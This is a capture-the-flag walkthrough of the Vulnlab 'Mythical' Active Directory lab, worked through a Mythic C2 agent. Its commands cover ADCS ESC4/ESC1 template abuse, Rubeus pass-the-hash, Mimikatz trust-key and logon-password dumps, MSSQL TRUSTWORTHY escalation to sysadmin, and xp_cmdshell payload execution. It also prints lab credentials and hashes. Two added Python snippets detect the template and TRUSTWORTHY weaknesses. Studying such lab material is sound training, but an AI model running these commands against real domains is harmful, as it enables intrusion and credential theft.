VL-Mythical

Mythical CHAIN - Penetration Testing Walkthrough

Initial Reconnaissance

Starting with our first machine discovery:

PORT     STATE SERVICE       REASON          VERSION
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc01.mythical-us.vl
| Issuer: commonName=dc01.mythical-us.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-28T15:12:13
| Not valid after: 2025-05-30T15:12:13
| MD5: ba60:dfbc:1933:a166:8d8b:c162:b60f:7716
| SHA-1: 666e:a128:ab04:d46a:5610:1836:8eb8:e4f8:bf5d:76bf

Second machine port scan results:

PORT     STATE SERVICE  REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10
80/tcp open http syn-ack ttl 63 Golang net/http server
7443/tcp open ssl/http syn-ack ttl 62 nginx 1.25.5
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: 400 The plain HTTP request was sent to HTTPS port
|_Requested resource was /new/login
| ssl-cert: Subject: organizationName=Mythic
| Issuer: organizationName=Mythic
| Public Key type: ec
| Public Key bits: 384
| Signature Algorithm: ecdsa-with-SHA384
| Not valid before: 2024-11-24T15:26:17
| Not valid after: 2025-11-24T15:26:17
| MD5: bc51:3614:2940:10c1:3fc7:fb2b:f260:7b09
| SHA-1: a844:a1a0:9f51:4d03:6d59:00cd:3fe4:2811:d1ec:d967
|_-----END CERTIFICATE-----

Third machine details:

PORT     STATE SERVICE       REASON          VERSION
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: MYTHICAL-EU
| NetBIOS_Domain_Name: MYTHICAL-EU
| NetBIOS_Computer_Name: DC02
| DNS_Domain_Name: mythical-eu.vl
| DNS_Computer_Name: dc02.mythical-eu.vl
| DNS_Tree_Name: mythical-eu.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-04-19T19:16:53+00:00
|_ssl-date: 2025-04-19T19:17:00+00:00; -1h59m43s from scanner time.

Initial Access - Mythic C2

Accessing the Mythic C2 interface at: https://<Machine 2 IP>:7443/new/login
Mythic C2 Login Interface
From the assumed breach, we received these credentials:

mythic_admin : wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX

Command Execution and Enumeration

After logging in, we begin sending commands to our agent:
Sending Commands via Mythic
First, we change directory to the user’s home folder, set the agent’s sleep interval to 0, then load and run SharpHound:

sleep 0 0
register_assembly SharpHound.exe
execute_assembly SharpHound.exe -c All

Then wait for SharpHound to finish and download the results:

download 20250419124353_BloodHound.zip

We send our data to BloodHound Community Edition (BHCE) for analysis. For reference on installing BHCE with Docker, see: https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf
From BloodHound analysis, we discover that user Momo has RDP access:
Momo Can RDP

Network Share Enumeration

Let’s find what shares we have access to. First, we need to navigate to:

C:\_admin\cwrsync\bin

RSync Executable Location
List available shares:

shell rsync.exe --list-only rsync://192.168.25.1

Available Shares
Now we’ll create a folder and copy the contents of the mythical share:

shell mkdir \hello
shell rsync -av rsync://192.168.25.1/mythical /

We discover a flag:
Flag Found

Credential Recovery

To download the it.kdbx file, we click the actions button and then download. The agent sends a task and the response enables downloading the file.
KeePass version 4 requires special handling as keepass2john doesn’t support it. We’ll use a GitHub repository with a bash script for brute-forcing:

https://github.com/r3nt0n/keepass4brute

From the wiki, we know the password should be in one of the smaller rockyou lists:

./keepass4brute.sh ../it.kdbx /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt

Password Found
Inside the KeePass database, we find credentials for a user named domjoin:
KeePass Contents

Certificate Template Exploitation

Let’s check for vulnerable certificate templates. We’ll use Certify, which needs to be compiled for Windows (Visual Studio 2019 with .NET 4):

register_assembly Certify.exe
execute_assembly Certify.exe find /vulnerable

Output reveals a vulnerable template:

[!] Vulnerable Certificates Templates :

CA Name : dc01.mythical-us.vl\mythical-us-DC01-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions

We’ve identified an ESC4 vulnerability. To exploit it, we’ll impersonate the domjoin user:

make_token mythical-us\domjoin <PASS>

Next, we’ll upload StandIn to create a computer account and join the domain:

register_assembly StandIn_v13_Net45.exe
execute_assembly StandIn_v13_Net45.exe --computer panosoiko --make

Machine Account Created
Impersonate the machine account we created:

make_token mythical-us\panosoiko$ zgbyv9HgwnfF2QV

With our machine account context, we’ll convert the ESC4 vulnerability to ESC1:

execute_assembly StandIn_v13_Net45.exe --ADCS --filter Machine --ess --add

The flag is successfully added to the template’s msPKI-Certificate-Name-Flag. Now add certificate enrollment permissions for the Domain Users group:

execute_assembly StandIn_v13_Net45.exe --ADCS --filter Machine --ntaccount "mythical-us\domain users" --enroll --add

Now exploit the ESC1 vulnerability using Certify:

execute_assembly Certify.exe request /ca:dc01.mythical-us.vl\mythical-us-DC01-CA /template:Machine /altname:administrator@mythical-us.vl

Domain Users Added
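
For defenders, the template change described in this section can be caught by evaluating the ESC1 preconditions on every template before and after a change. The following is an added example, not part of the original walkthrough or of Certify/StandIn; the dictionary layout, the function names and the enrollment lists are assumptions, while the flag bits and EKU OIDs are the documented values.

```python
# Added example: ESC1 precondition check over certificate template attributes.
# Bit values follow MS-CRTD; both template snapshots below are constructed.
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag bit
PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag bit (manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}
BROAD = {"domain users", "domain computers", "authenticated users", "everyone"}

def esc1_reasons(t):
    """Return why a template is ESC1-exposed, or [] if any precondition is missing."""
    auth = [AUTH_EKUS[o] for o in t["ekus"] if o in AUTH_EKUS]
    if not t["ekus"]:
        auth = ["none listed (certificate valid for any purpose)"]
    broad = sorted(p for p in t["enroll"] if p.split("\\")[-1].lower() in BROAD)
    conditions = [
        (t["name_flag"] & ENROLLEE_SUPPLIES_SUBJECT, "requester supplies the subject/SAN"),
        (auth, "authentication EKU: " + ", ".join(auth)),
        (not t["enrollment_flag"] & PEND_ALL_REQUESTS, "no manager approval"),
        (t["ra_signatures"] == 0, "no authorized signatures required"),
        (broad, "broad enrollment rights: " + ", ".join(broad)),
    ]
    return [why for _, why in conditions] if all(ok for ok, _ in conditions) else []

def newly_exposed(before, after):
    """Template names that satisfy ESC1 in `after` but did not in `before`."""
    return sorted(name for name, t in after.items()
                  if esc1_reasons(t) and not (name in before and esc1_reasons(before[name])))

MACHINE_BEFORE = {  # mirrors the Certify output above; enrollment list is constructed
    "name_flag": 0x18000000,   # SUBJECT_ALT_REQUIRE_DNS | SUBJECT_REQUIRE_DNS_AS_CN
    "enrollment_flag": 0x20,   # AUTO_ENROLLMENT
    "ra_signatures": 0,
    "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.1"],
    "enroll": ["MYTHICAL-US\\Domain Admins", "MYTHICAL-US\\Domain Computers"],
}
MACHINE_AFTER = dict(
    MACHINE_BEFORE,
    name_flag=MACHINE_BEFORE["name_flag"] | ENROLLEE_SUPPLIES_SUBJECT,
    enroll=MACHINE_BEFORE["enroll"] + ["MYTHICAL-US\\Domain Users"],
)

if __name__ == "__main__":
    for label, t in (("before", MACHINE_BEFORE), ("after", MACHINE_AFTER)):
        print(label, esc1_reasons(t) or "not ESC1")
```

Run against periodic exports of the template objects, newly_exposed() highlights a template whose attributes were edited into an ESC1 state, which is the signal that write access to templates (ESC4) has been abused.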

Certificate to NTLM Hash

Load Rubeus for ticket manipulation:

register_assembly Rubeus.exe

Save the Certify output to a cert.pem file and convert it:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Upload the certificate:

upload -File (path)cert.pfx

Use Rubeus to extract the Administrator’s NTLM hash:

execute_assembly Rubeus.exe asktgt /user:Administrator /certificate:c:\users\momo.ayase\admin.pfx /ptt /nowrap /getcredentials

Administrator Hash Retrieved
Obtained hash: C583EF48C5ED66NOPENOPENOPE
Since Mimikatz didn’t work, we’ll use Invoke-SMBExec.ps1 to trigger the agent with admin privileges:

powershell Invoke-SMBExec -Target 127.0.0.1 -Domain mythical-us.vl -Username administrator -Hash <HASH> -Command "c:\programdata\google\update.exe"

System Shell Obtained

Domain Trust Exploitation

After uploading Mimikatz again, we’ll dump the domain trust information to explore the relationship with DC02:

shell C:/Users/Administrator/mimikatz.exe "lsadump::trust /patch"

Output reveals trust details:

Domain: MYTHICAL-EU.VL (MYTHICAL-EU / S-1-5-21-1148612195-3581135157-3534241443)
[ In ] MYTHICAL-US.VL -> MYTHICAL-EU.VL

[ Out ] MYTHICAL-EU.VL -> MYTHICAL-US.VL
* 4/20/2025 7:02:21 AM - CLEAR - e6 39 a6 04 66 75 38 7d 33 a6 13 ce 4f 66 cf f9 fc 9f c4 79 6d f7 cc 0a 0e 51 5a 34 59 5a e9 79 4f ad 90 d6 c1 95 47 66 00 fe 65 02 4c b4 b3 8e 8f b1 31 07 af 43 5e 39 be 1a aa ac ed 06 70 3a 86 5c 48 76 3d f5 f5 a8 f2 57 08 fd 42 0a 6d 32 3b f6 5e 5f ac 62 94 4b 91 e7 d8 3c 3e ea c8 b4 07 f8 f7 ce 35 8a 99 8c 60 23 b4 df 63 fc a5 5a a7 57 26 da 76 eb 22 ec f7 4b e2 55 21 7c 6a 43 65 3f fd 1b 43 49 53 9f 5e 14 e4 c6 13 42 af 93 a1 4d 24 07 f8 91 28 10 d6 b7 70 59 ac fb c2 f7 22 aa d0 d7 f2 2c c2 24 cb 44 b0 3b 64 89 46 a8 9b 9c 78 ef 7f 5e e1 7d 11 5d 1f 98 4c 12 8b dd 89 5d c5 2b ce 8c eb ff bb 76 0e 2a 98 0c 0b 51 b8 c3 5e 74 2d 7a 87 4d 6b 67 4a 0c 45 4f b6 fe a9 05 2f 60 2b c9 bf 76 ba 78 7a 66 89 61 29 52
* aes256_hmac a1757854f414bcd2aefc48cd445abae179806110cf763f255b5032f36ae4f1c3
* aes128_hmac f9b024c28fee48b95fd0fc27546affc9
* rc4_hmac_nt d96d7d0a04d48ee91ab49a97c012fefd

[ In-1] MYTHICAL-US.VL -> MYTHICAL-EU.VL

[Out-1] MYTHICAL-EU.VL -> MYTHICAL-US.VL
* 4/20/2025 7:02:21 AM - CLEAR - a1 39 02 5e 0a 3d ce c0 af c9 6a ab 1c ea 0a 0a 7e 3f 20 d2 ea f6 95 93 c2 9f f8 7e
* aes256_hmac cecbd91e50ff3ee7fbd725fbe9e2f3ea4d4445e549100607c3f2239307391076
* aes128_hmac 652888ee3ab5fac7ea1ebf84e423d59d
* rc4_hmac_nt eb921a2b0e9d626559dab0f54fdc6498

Additional trust information:

Direction               : Outbound
DisallowTransivity : False
DistinguishedName : CN=mythical-eu.vl,CN=System,DC=mythical-us,DC=vl
ForestTransitive : False
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : mythical-eu.vl
ObjectClass : trustedDomain
ObjectGUID : 03ce402a-bf80-4b34-81dd-53cbe802337d
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source : DC=mythical-us,DC=vl
Target : mythical-eu.vl
TGTDelegation : False
TrustAttributes : 4
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

We discover that users from mythical-eu.vl can authenticate to mythical-us.vl, but not vice versa - a one-way trust. Following GitHub guidance, we exploit trust accounts:

execute_assembly -Assembly Rubeus.exe -Arguments asktgt /user:mythical-us$ /domain:mythical-eu.vl /rc4:d96d7d0a04d48ee91ab49a97c012fefd /nowrap /ptt

Trust Account Access
Now we can enumerate users on mythical-eu.vl:

powershell get-aduser -Filter * -Server mythical-eu.vl -Properties *
get-aduser -Filter * -Server "dc02.mythical-eu.vl" -Property DisplayName, SamAccountName | Select-Object DisplayName, SamAccountName

Results reveal service accounts that might be exploitable:

DisplayName      SamAccountName  
----------- --------------
Administrator
Wendy Adams Wendy.Adams
William Jennings William.Jennings
Julie Khan Julie.Khan
Alan Rhodes Alan.Rhodes
Jay Little Jay.Little
Owen Dunn Owen.Dunn
Howard Frost Howard.Frost
Naomi Campbell Naomi.Campbell
Judith Smith Judith.Smith
Nicholas Hill Nicholas.Hill
Karl Kaur Karl.Kaur
Hilary Pearson Hilary.Pearson
Marcus Elliott Marcus.Elliott
Fiona Knight Fiona.Knight
Jay Miller Jay.Miller
Josephine Smith Josephine.Smith
Mohammad Jones Mohammad.Jones
Glen Price Glen.Price
Amber Hussain Amber.Hussain
Megan Higgins Megan.Higgins
Donald Burton Donald.Burton
Jasmine Smith Jasmine.Smith
Kim Byrne Kim.Byrne
Jack Chambers Jack.Chambers
Danielle Andrews Danielle.Andrews
svc_ldap svc_ldap
svc_sql svc_sql
root root

The svc_sql and svc_ldap accounts look promising. We search for SPNs but find none:

powershell Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName -Server dc02.mythical-eu.vl | Select Name, ServicePrincipalName

DC02 Share Enumeration

Let’s search through DC02 shares:

shell net view \\dc02.mythical-eu.vl\

DC02 Shares
We spot a non-standard “dev” share. Let’s explore it:

ls \\dc02.mythical-eu.vl\dev

We find:

Autologon64.exe
getusers.exe

Using dnSpy to analyze these executables, we discover credentials:

svc_ldap : <PASS>

Cleartext Password for svc_ldap

Port Scanning and SQL Server Access

Using PortScanner to check for MSSQL ports on DC02:

execute_assembly -Assembly PortScanner.exe -Arguments hosts=10.10.161.167 ports=1433,1434 timeout=3000

We find port 1433 open, indicating MSSQL is running. Password spraying reveals svc_sql has the same password as svc_ldap:

make_token mythical-eu\svc_sql <PASS>

Upload sqlcmd and rename it to avoid issues:

cp -Source C:/Users/Administrator/sqlcmd.exe -Destination C:/Users/Administrator/sql.exe

SQL Command Tool Renamed
Successfully connecting to SQL Server:
SQL Server Access
Attempting to enable xp_cmdshell fails due to insufficient permissions:
No Command Shell Access

SQL Server Privilege Escalation

Checking our current privileges:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');"

We attempt to find users we can impersonate:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"

Cannot Impersonate Users
Listing database owners:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -d msdb -Q "SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)"

Database Ownership
We will escalate from svc_sql to dbo following SQL privilege escalation techniques:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT name, is_trustworthy_on FROM sys.databases WHERE name = 'msdb';"

Trustworthy Database
Create a malicious stored procedure in msdb:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -d msdb -Q "CREATE PROCEDURE sp_elevate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'MYTHICAL-EU\svc_sql', 'sysadmin';"

Execute the stored procedure:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -d msdb -Q "EXEC sp_elevate_me;"

Verify sysadmin role:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT IS_SRVROLEMEMBER('sysadmin');"

Sysadmin Achieved
Enable xp_cmdshell:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';"

xp_cmdshell Enabled
We are running as nt service\mssql$sqlexpress.
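
The escalation in this section depends on three settings lining up: a database with TRUSTWORTHY on, owned by a sysadmin login, in which a non-sysadmin principal holds db_owner. The following added example (not from the original walkthrough) audits query results for that combination and suggests a fix per finding; every row is constructed, the function names are assumptions, and the suggested statements assume the database user name matches the listed member.

```python
# Added example: audit for the TRUSTWORTHY escalation path described above.
# Rows are constructed stand-ins for sys.databases / role-membership query results.
DATABASES = [  # (name, is_trustworthy_on, owner login)
    ("master", 0, "sa"),
    ("msdb", 1, "sa"),            # msdb ships with TRUSTWORTHY ON
    ("appdb", 1, "app_owner"),    # trustworthy, but the owner is not a sysadmin
    ("reports", 1, "sa"),
]
SYSADMINS = {"sa"}
ROLE_MEMBERS = [  # (database, role, member)
    ("msdb", "db_owner", "MYTHICAL-EU\\svc_sql"),
    ("msdb", "SQLAgentUserRole", "MYTHICAL-EU\\svc_ldap"),
    ("appdb", "db_owner", "app_user"),
    ("reports", "db_owner", "report_writer"),
    ("reports", "db_datareader", "analyst"),
]

def escalation_paths(databases, sysadmins, role_members):
    """(database, member) pairs where a non-sysadmin db_owner can run code as a sysadmin owner."""
    risky = {name for name, trustworthy, owner in databases
             if trustworthy and owner in sysadmins}
    return sorted((db, member) for db, role, member in role_members
                  if db in risky and role == "db_owner" and member not in sysadmins)

def remediation(db, member):
    """Suggested T-SQL for one finding; msdb keeps TRUSTWORTHY, so its membership is removed."""
    if db == "msdb":
        return f"USE [msdb]; ALTER ROLE [db_owner] DROP MEMBER [{member}];"
    return f"ALTER DATABASE [{db}] SET TRUSTWORTHY OFF;"

if __name__ == "__main__":
    for db, member in escalation_paths(DATABASES, SYSADMINS, ROLE_MEMBERS):
        print(f"{member} -> sysadmin via {db}: {remediation(db, member)}")
```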

Payload Deployment

Create a share for our agent:

mkdir -Path C:\hello
shell net share hello=C:\hello /grant:everyone,full
cp -Source C:/programdata/google/update.exe -Destination C:/hello/update.exe

Copy from the share to DC02:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "EXEC xp_cmdshell 'copy \\10.10.139.85\hello\update.exe C:\Windows\Temp\update.exe';"

Execute it:

shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "EXEC xp_cmdshell 'C:\Windows\Temp\update.exe';"

DC02 Access Gained

Privilege Escalation to SYSTEM

Since we’re running as a service, we have the SeImpersonatePrivilege enabled. We’ll use EfsPotato since SweetPotato doesn’t work:

register_assembly EfsPotato.exe
execute_assembly EfsPotato.exe \\10.10.139.85\hello\update.exe

System Access on DC02


The flag is in memory (user “root”).

mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

Search around and you will find the flag :0
https://api.vulnlab.com/api/v1/share?id=a325bfee-e9a7-49f2-9646-494f10841eef